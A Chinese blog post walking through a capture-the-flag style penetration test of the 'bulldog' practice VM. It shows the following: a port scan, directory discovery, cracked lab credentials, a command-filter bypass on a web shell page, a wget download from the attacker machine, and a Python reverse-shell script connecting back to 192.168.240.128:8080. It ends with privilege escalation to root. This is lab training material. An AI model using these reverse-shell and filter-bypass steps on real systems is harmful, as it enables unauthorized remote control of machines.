渗透测试实战-bulldog

最新推荐文章于 2024-05-20 08:43:19 发布
最新推荐文章于 2024-05-20 08:43:19 发布
阅读量5.9k 收藏 28
点赞数 5
分类专栏: 我的渗透之路 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/122727221
版权

文章目录

环境准备

  • kali 当成攻击机
  • bulldog靶机
    官网下载地址
    Vmware装入即可,成功后是显示这个样子
    在这里插入图片描述
  • kali ip 是:192.168.240.128

信息收集

使用nmap 扫一下靶机处于的网段情况
使用

nmap -sn 只进行主机发现,不进行端口扫描
nmap -Pn 并进行端口扫描

  • 已知对方网段在192.168.240.中
  • 所以nmap扫一下即可
    在这里插入图片描述

漏洞利用

可以看到开放了80端口我们访问一下
在这里插入图片描述

我们就可以利用常规漏洞(sql注入xss等等)
我们首先想到的就是目录扫描了,看看能给我们带来什么惊喜

  • 这里用的是dirsearch

  • 果然惊喜一大堆,首先就能看到后台了
    在这里插入图片描述

  • 万能密码,弱口令无果

在这里插入图片描述
尝试访问dev 发现有东西,查看源码得到
在这里插入图片描述
信息收集了一波尝试访问发现需要账号认证
在这里插入图片描述
首先破解md5,

推荐网站https://www.somd5.com/

经尝试只有最后两个解得出来
在这里插入图片描述
在这里插入图片描述

nick@bulldogindustries.com   bulldog
sarah@bulldogindustries.com  bulldoglover

尝试登入
在这里插入图片描述
登入成功.尝试访问那个shell网站

在这里插入图片描述
发现可以执行命令 ,所以后门要做的就是进一步获取shell

后期利用

思路一

在这里插入图片描述
首先发现直接执行命令会被检测,这里我们利用&绕过

  • 当然也可以用 |

我们尝试用weget 来进行测试

首先启动 service apache2 start
然后监听1234端口让其访问
然后pwd | weget http://192.168.240.128/12.html

操作如图
在这里插入图片描述
发现可以进行访问
当然也可以

python -m SimpleHTTPServer 80 来创建简单的服务访问即可

既然weget 能访问,那末我们直接远程下载python 恶意脚本即可 首先创建 pay.py内容为


import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.240.128",8080))
os.dup2(s.fileno(),0)       
os.dup2(s.fileno(),1)       
os.dup2(s.fileno(),2)

具体shell 如何创建,可以评论区留言下棋更新其用法
weget 下载后执行即可
在这里插入图片描述
直接弹回shell 成功

后期利用

在home中查看用户
在这里插入图片描述
ls 无回显,ls -a 查看所有
在这里插入图片描述
访问它
在这里插入图片描述
strings 显示文件内容找到密码
在这里插入图片描述

利用 python -c 'import pty;pty.spawn("/etc/bash")'

进行提取操作
在这里插入图片描述
拿到root权限

总结

  • 就是前期的漏洞收集一定要做好,这个靶机漏洞很明显所以渗漏思路很简单,还有很多的拿shell操作没有学,今天学到了 weget 下可以远程下载 shell至于 是python shell不是bash 呢,我试了试是因为,检测到了字符然后失败,所以利用python socket 进行弹shell.
  • 还要继续学本领,
  • 今天就到这里了,明天继续加油
Rgylin
关注
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】记一次简单渗透测试实战
lzhy666的博客
03-29 371
【网络安全】记一次简单渗透测试实战
Web渗透测试-实战 方法 思路 总结
Python栈
10-19 279
天眼查是一款“都能用的商业安全工具”,根据用户的不同需求,实现了企业背景、企业发展、司法风险、经营风险、经营状况、知识产权方面等多种数据维度的检索。通过以上不同种类的搜索引擎我们可以获得相当多的有用的信息,甚至平时搜索东西我们也可以通过zoomeye来找到自己想要的东西。ZoomEye是一款针对网络空间的搜索引擎,收录了互联网空间中的设备、网站及其使用的服务或组件等信息。并不是所有的格式都会支持,现在百度支持的格式有pdf、doc、xls、all、ppt、rtf,
渗透测试实战-BurpSuite 使用入门
似水流年的博客
12-14 2290
近期笔者在学习 web 渗透测试的相关内容,主要是为了公司之后的安全产品服务。渗透测试本身在学习过程中还是很有意思的,有一种学习到了之前想学但是没学的黑客技术的感觉,并且对笔者已掌握的许多知识做了有益的补充。要学习渗透测试,首先需要明白什么是渗透测试,以及如何进行渗透测试,这其中很多资料可以在网上找到。渗透测试是一项在计算机系统上进行的授权模拟攻击,旨在对其安全性进行评估。渗透测试人员使用与攻击者相同的工具、技术和流程,来查找和展示系统弱点对业务带来的影响。渗透测试通常会模拟各种可能威胁您业务的攻击。
一次渗透测试实战
qq_53058639的博客
05-20 673
通过这一次渗透测试实战经历,让我对自己的信息收集和漏洞利用方面的思路得到了提升,但在权限提升,内网渗透方面学习的比较浅,还需要继续学习。接下来我将给各位同学划分一张学习计划表!
【入狱率99%】非常“刑“又可”拷“~的全栈安全测试渗透测试(burpsuite+appscan实战)【一】
测试逍遥子的博客
03-28 1743
【入狱率99%】非常"刑"又可”拷“~的全栈安全测试渗透测试(burpsuite+appscan实战
渗透测试——记一次内网渗透实战经验
qq_44484541的博客
06-07 395
用友GRP-U8任意文件上传漏洞 1、通过漏洞扫描检测到服务器192.168.110.109,存在用友GRP-U8任意文件上传漏洞 2、利用burp构造漏洞测试文件 3、访问测试文件成功,存在任意文件上传漏洞 4、通过burp 工具构建攻击数据包,上传webshell,回显200 5、通过蚁剑连接工具访问webshell,获取到服务器system权限
安全渗透测试实战分享
OKCRoss的博客
05-06 268
本文我们将以围绕系统安全质量提升为目标,讲述在功能安全测试&安全渗透测试上实践过程。
vuInhub靶场实战系列-bulldog-1
最新发布
06-03
vuInhub靶场实战系列-bulldog-1
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
刚入门小黑客记一次对某站点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1420
渗透已授权。非授权渗透是违法行为!
完整的渗透测试实战纪实,低危漏洞组合成高危利用!
05-26 1845
0x00一份好的报告标题也很重要哦 PS:原谅下图重码,此漏洞还没修复 报告详情 漏洞标题某国内大厂招聘系统测试 漏洞url* 0x01本次渗透流程 我们一步一步来, 首先我们从忘记密码那里开始,这里的验证码可以绕过 我们可以输入用户名来批量爆破存在的用户 因为它这里的数据包是没有验证码的参数的,直接拿top 500姓名来跑 248 — 存在 272 — 不存在 367 —{“code”:{“code”:”0005”,”msgId”:”**“,”msg”:”该用户名/手机号/邮箱关
【渗透项目】Bulldog网站渗透
命运的旋律的博客
12-13 477
Bulldog网站渗透 文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主机发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升 1.渗透思路 进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法 在未知目标主机的情况下,使用netdiscover主机发现获得主机IP地址 得到主机的IP地址后,使用masscan进行快速的端口...
综合渗透测试实战项目
干铮的博客
02-07 6403
1.项目网络拓扑 1.信息收集 netdiscover进行主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 端口服务探测 这里使用两款工具一款是nmap nmap -A 192.168.3.134 -p- -oN nmap.a kali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.a Starting Nmap 7.80 ( https://n
记一次渗透测试实战
zhangge3663的博客
11-02 1386
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
渗透测试实战8——SickOS靶机入侵
浅浅的博客
05-10 3112
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——22端口 端口探测——80端口 1、目录探测 2、获取shell 3、提权 4、防火墙规则 一、实验环境 攻击机(Kali):192.168.247.181 靶机(SickOS):192.168.247.180 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22...
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值